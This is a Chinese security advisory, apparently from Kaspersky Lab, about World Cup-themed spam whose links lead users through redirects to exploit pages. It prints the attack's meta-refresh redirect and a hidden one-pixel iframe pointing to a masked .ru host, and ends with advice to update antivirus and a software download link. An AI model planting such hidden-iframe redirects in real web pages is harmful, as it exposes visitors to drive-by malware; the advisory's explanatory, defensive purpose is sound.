世界杯刚刚才开始,一些网民的计算机就已经收到了一些网络罪犯发送的有关球赛话题的垃圾邮件,如下所示:
从邮件标题中可以看到,邮件内容是关于世界杯的“坏消息”,很多人看到这里,就会抑制不住自己的好奇心,点开邮件中的链接。但是网友不知道的是,一旦点击该链接,浏览器就会执行以下代码:
对这些代码简单破译后,我们可以看到其将会将用户指向如下链接:
hxxp://xxxxxxxxxxxxxxxx.com/xnu4ej/z.htm
这个链接中包含iframe,会将用户指向恶意的URL地址。如下所示:
<metahttp-equiv="refresh"content="3;url=http://txxxxk.com/"/>
<iframesrc='http://xxxxxx.ru:8080/index.php?pid=10'width='1'height='1'style='visibility:hidden;'></iframe>
而URL地址上则有漏洞利用程序。所以,计算机用户如果点击了上述邮件中的链接,最终会访问和运行漏洞利用程序,被恶意程序所感染。
需要注意的是,网络罪犯虽然擅于用多种途径感染计算机,但大致手段都相同。比如此类垃圾邮件虽然数量庞大,但是邮件内容和主题都大致相同。而且其中的恶意URL地址以及JS代码都曾经在以前的垃圾邮件中利用过。对于这种威胁,网民也不必过于惊慌。目前,卡巴斯基实验室的反病毒产品可以完全检测和查杀这些恶意代码和漏洞利用程序。请广大网民及时升级反病毒数据库,并且保持高度警惕性,不要轻易打开来源不明的邮件。
卡巴斯基实验室祝球迷们度过一个美好的世界杯,同时也提醒网民在互联网上浏览球赛相关信息时多加防备。
点击下载卡巴斯基全功能安全软件:http://www.skycn.com/soft/29876.html
本文来源:天空软件 作者:佚名